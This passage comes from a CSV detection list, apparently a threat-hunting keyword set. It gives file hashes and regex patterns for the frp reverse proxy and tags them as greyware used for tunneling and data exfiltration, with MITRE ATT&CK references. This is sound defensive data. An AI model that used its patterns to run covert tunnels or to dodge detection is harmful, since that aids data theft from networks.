Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*db80349f17c39f502a631afda7cf5b95b2a85cdcafa92359b9f4d0375772c440*",".{0,1000}db80349f17c39f502a631afda7cf5b95b2a85cdcafa92359b9f4d0375772c440.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*dc3220af2b22469da26209d4b376858c11160127e83bce09f85cd0c27a44d5d0*",".{0,1000}dc3220af2b22469da26209d4b376858c11160127e83bce09f85cd0c27a44d5d0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*dd781cfd710345cca2df4d306245298efb61dc447d8004dd5542c1b2083e39a7*",".{0,1000}dd781cfd710345cca2df4d306245298efb61dc447d8004dd5542c1b2083e39a7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*dd8057968d3560e9ecb42b2ed50b796ec09573d5263f689c8e0633a8b8a7127a*",".{0,1000}dd8057968d3560e9ecb42b2ed50b796ec09573d5263f689c8e0633a8b8a7127a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*de3397d1084686a5ab9f82fae2aa65f417cef7d7c2cc12f7eb9da51c0a404de6*",".{0,1000}de3397d1084686a5ab9f82fae2aa65f417cef7d7c2cc12f7eb9da51c0a404de6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*de6262f886175411573c98fe2d5838449b4fc2472a07748964159a468ed0ccdf*",".{0,1000}de6262f886175411573c98fe2d5838449b4fc2472a07748964159a468ed0ccdf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*df37d932eb846e608187b0aca6d182467ff24c548a044b9206a93913ec93c752*",".{0,1000}df37d932eb846e608187b0aca6d182467ff24c548a044b9206a93913ec93c752.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*df7356db409cc406294211063bf387a8b590289370811b1d10d6fdd1023c3250*",".{0,1000}df7356db409cc406294211063bf387a8b590289370811b1d10d6fdd1023c3250.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*dfd7bc3410c018dc8bcf897696ddfb10e7aaf5a584b8220ae3949ec87205ea4c*",".{0,1000}dfd7bc3410c018dc8bcf897696ddfb10e7aaf5a584b8220ae3949ec87205ea4c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e0b8976e986ef0ed0901560810a81cc80cf8c332e087edd35f50e9a5a88c79ae*",".{0,1000}e0b8976e986ef0ed0901560810a81cc80cf8c332e087edd35f50e9a5a88c79ae.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*e195429f06e01890fa50719ead4dfdc338b80c9703f6d6c7b9e12c234ff2f39f*",".{0,1000}e195429f06e01890fa50719ead4dfdc338b80c9703f6d6c7b9e12c234ff2f39f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e2047b43e87456568a505b84c45f52e0d2ed146896ec1e3fceb72e818200f11f*",".{0,1000}e2047b43e87456568a505b84c45f52e0d2ed146896ec1e3fceb72e818200f11f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e20d90b0670c637a65125f89467170efb3fc227a78f44ee585a6d3fb55b6a881*",".{0,1000}e20d90b0670c637a65125f89467170efb3fc227a78f44ee585a6d3fb55b6a881.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e2a6179880b852366edc395685fa0e82eec542e9c8a2c3483d30d5740941a0e0*",".{0,1000}e2a6179880b852366edc395685fa0e82eec542e9c8a2c3483d30d5740941a0e0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*e2dd4933cc48caba288be96ba5b226c7edb5be940c0452d9bc7faa28ab66847f*",".{0,1000}e2dd4933cc48caba288be96ba5b226c7edb5be940c0452d9bc7faa28ab66847f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e2f75360702bcdc390997de7b2557f21a1f28d7ebd4d1ca74cf2e38849185bcb*",".{0,1000}e2f75360702bcdc390997de7b2557f21a1f28d7ebd4d1ca74cf2e38849185bcb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e33075389b77f94a816ac45bf1d0ce2b540fd98dafac9828602625088967762f*",".{0,1000}e33075389b77f94a816ac45bf1d0ce2b540fd98dafac9828602625088967762f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e377afeb481b30d9979fcbf636df6b5c4f9449b44f6c3d21a768aa5cb8767cb6*",".{0,1000}e377afeb481b30d9979fcbf636df6b5c4f9449b44f6c3d21a768aa5cb8767cb6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*e57919a0e3a63705ef452bb2a6bc440f7a6273a8205ed9ce2ccfd063ea9b2215*",".{0,1000}e57919a0e3a63705ef452bb2a6bc440f7a6273a8205ed9ce2ccfd063ea9b2215.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e61df02bd13c250267ded9f0db8ef0e0f3a3eea63efbb8d041190883b0cee0cb*",".{0,1000}e61df02bd13c250267ded9f0db8ef0e0f3a3eea63efbb8d041190883b0cee0cb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e67faadd41e6236f2bd67d35c9dfd807ff2941027686632f6f4c339dea8ef263*",".{0,1000}e67faadd41e6236f2bd67d35c9dfd807ff2941027686632f6f4c339dea8ef263.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*e73e6a2bc3fc1900fb2810bf53bed0471149fb07c60917027661d9d654c0f6e8*",".{0,1000}e73e6a2bc3fc1900fb2810bf53bed0471149fb07c60917027661d9d654c0f6e8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*ea017c89015802214d1f831d464e018f629856a3a91ac6b350c731aa0e739315*",".{0,1000}ea017c89015802214d1f831d464e018f629856a3a91ac6b350c731aa0e739315.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ea30c0eec6a6a2395212dd91016e134bbde0bd99b3547598e1f71b626fe5c9ef*",".{0,1000}ea30c0eec6a6a2395212dd91016e134bbde0bd99b3547598e1f71b626fe5c9ef.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*eb8ea449f14a20480c77d6501f8b682516fa4a9394dd15d2a49b6a957aa862a9*",".{0,1000}eb8ea449f14a20480c77d6501f8b682516fa4a9394dd15d2a49b6a957aa862a9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*eb941be4a478faf7f2c61a6d5fb5fca889c7908a0d882a06e61c2e1cefc91260*",".{0,1000}eb941be4a478faf7f2c61a6d5fb5fca889c7908a0d882a06e61c2e1cefc91260.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*ec8938be2d1b535eeaf7ba803dae2b6fa1059c6106791d59d98600928dfcc057*",".{0,1000}ec8938be2d1b535eeaf7ba803dae2b6fa1059c6106791d59d98600928dfcc057.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ed25f0c61c45c7f013f2f5ef9194cb2854805db9c692f656e2b30a6ad1681436*",".{0,1000}ed25f0c61c45c7f013f2f5ef9194cb2854805db9c692f656e2b30a6ad1681436.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ee2d0d800b14ac26b8aeae4365df031e0186d23be150308735a0be753ec2d3f9*",".{0,1000}ee2d0d800b14ac26b8aeae4365df031e0186d23be150308735a0be753ec2d3f9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ee8cdc63c2993ce8ab2bf918a56169a815254cd5f5a9a57567a904ec5dbf0145*",".{0,1000}ee8cdc63c2993ce8ab2bf918a56169a815254cd5f5a9a57567a904ec5dbf0145.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*eeb4247038f58d6b89bd5608782489eeaa7bcfb83d61b5475284ab612978b328*",".{0,1000}eeb4247038f58d6b89bd5608782489eeaa7bcfb83d61b5475284ab612978b328.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ef44189d246b4a95e0eabbf1d6d86ba94002e6f2bb5eefca8e3e8b8292abc085*",".{0,1000}ef44189d246b4a95e0eabbf1d6d86ba94002e6f2bb5eefca8e3e8b8292abc085.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*efd2156b1477d88b8ce1d9428cdeb1689bd12cefb4b31ca81b70eb7d65e22e59*",".{0,1000}efd2156b1477d88b8ce1d9428cdeb1689bd12cefb4b31ca81b70eb7d65e22e59.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f0439788bbeda72664259defbc0edb12825cbf2928c922e06103b7b715bae88a*",".{0,1000}f0439788bbeda72664259defbc0edb12825cbf2928c922e06103b7b715bae88a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*f0716ffcfd48207b8de4f82ccf9ba87e876f0700f6699fc1140d08b7a8f741b4*",".{0,1000}f0716ffcfd48207b8de4f82ccf9ba87e876f0700f6699fc1140d08b7a8f741b4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f14655042086ef4653c0351a6464fb7d73473baf26e15a5f59c298bd3df23d1c*",".{0,1000}f14655042086ef4653c0351a6464fb7d73473baf26e15a5f59c298bd3df23d1c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f1985ce963979371360df27054ba07df4d4ee35338880bed83ef609a4648c420*",".{0,1000}f1985ce963979371360df27054ba07df4d4ee35338880bed83ef609a4648c420.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f1dc0436b7f9f3f5c5d404cf5fb4a7319ff1cc22a06a687672020af620693f70*",".{0,1000}f1dc0436b7f9f3f5c5d404cf5fb4a7319ff1cc22a06a687672020af620693f70.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*f2f9c488451676a58566f6daf2a8a1c85aea193abdc7d7241ef0e12675238bc9*",".{0,1000}f2f9c488451676a58566f6daf2a8a1c85aea193abdc7d7241ef0e12675238bc9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f300f69fe05b47e3b3e571a1fd83c7c0f7d69667d50a78ccbaa551bda3078169*",".{0,1000}f300f69fe05b47e3b3e571a1fd83c7c0f7d69667d50a78ccbaa551bda3078169.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f39f10c0867a52eb9e4d2adf0bfa821993c950feca35437e84d274fba00bc595*",".{0,1000}f39f10c0867a52eb9e4d2adf0bfa821993c950feca35437e84d274fba00bc595.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f4cb27fb222cdd87a30674270614adfd0aa8350034a8bdbc50fc1967c0f0cb66*",".{0,1000}f4cb27fb222cdd87a30674270614adfd0aa8350034a8bdbc50fc1967c0f0cb66.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*f5031cd5e3b444296ef19016555560b69b8f9b54defbbd7e8202b9ef86510d4b*",".{0,1000}f5031cd5e3b444296ef19016555560b69b8f9b54defbbd7e8202b9ef86510d4b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f56461c7a75839fa5ab3f8be2988f9f5d57c8121c4d7c31e17d2d3a7447d2a7d*",".{0,1000}f56461c7a75839fa5ab3f8be2988f9f5d57c8121c4d7c31e17d2d3a7447d2a7d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f5acd6dd3812f30ed6a2a2a864231563a962d4ff09c64d21be106db6f8806af8*",".{0,1000}f5acd6dd3812f30ed6a2a2a864231563a962d4ff09c64d21be106db6f8806af8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f5c9543b4b7731b40ea5cb0ebbc655d631adc7f2eedcea1f913e3d4d96b51b44*",".{0,1000}f5c9543b4b7731b40ea5cb0ebbc655d631adc7f2eedcea1f913e3d4d96b51b44.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*f644cc4d5e23d896721d1eb59057a5b42d57676ffd7c81bd67b9c33d7db3e4f2*",".{0,1000}f644cc4d5e23d896721d1eb59057a5b42d57676ffd7c81bd67b9c33d7db3e4f2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f64a03af886034ad8380631ef1d65728175f5af79674af39c29978a86c181c7a*",".{0,1000}f64a03af886034ad8380631ef1d65728175f5af79674af39c29978a86c181c7a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f6b96c46d8395d08ae91d5a19d55f8c9f19d512207612a89ca4c79df0c2f3c5d*",".{0,1000}f6b96c46d8395d08ae91d5a19d55f8c9f19d512207612a89ca4c79df0c2f3c5d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*f8b9c30d3cef82aebdf5dfce8ba7d6a4943a4b51ef64223b59c5241e3023d8e5*",".{0,1000}f8b9c30d3cef82aebdf5dfce8ba7d6a4943a4b51ef64223b59c5241e3023d8e5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*f9c6ad68a9e3903d1689cd85e84f00aa892a9e98b368a9f062599da9d2cb4967*",".{0,1000}f9c6ad68a9e3903d1689cd85e84f00aa892a9e98b368a9f062599da9d2cb4967.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fatedier/frp*",".{0,1000}fatedier\/frp.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fc465df713f8c9d63c9380aa9da72b6ef639fb44917aed390d9c4d08c475a20d*",".{0,1000}fc465df713f8c9d63c9380aa9da72b6ef639fb44917aed390d9c4d08c475a20d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fc5c5c5ff93300cea3141ff55fbccccb07cd0017d4e9cd4bcd324563f88f53fd*",".{0,1000}fc5c5c5ff93300cea3141ff55fbccccb07cd0017d4e9cd4bcd324563f88f53fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*fdbcc2a7d73552e690bc9ca7fccb69b9efdf10fc4d78f0f7c63b14a9129bb116*",".{0,1000}fdbcc2a7d73552e690bc9ca7fccb69b9efdf10fc4d78f0f7c63b14a9129bb116.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fdc0bca8460360346991a0f13e25233c87805bdc0f055f221f9c57c33b3b60fa*",".{0,1000}fdc0bca8460360346991a0f13e25233c87805bdc0f055f221f9c57c33b3b60fa.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fdde1a3e82d043cdca44b13c45e7593b61707385b30e919c38615d02d53e4b36*",".{0,1000}fdde1a3e82d043cdca44b13c45e7593b61707385b30e919c38615d02d53e4b36.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fe1eaa0c7066ad45a8a13838d15a6a6535e69250ecc3ed8c48bfb480c8b87e5a*",".{0,1000}fe1eaa0c7066ad45a8a13838d15a6a6535e69250ecc3ed8c48bfb480c8b87e5a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - 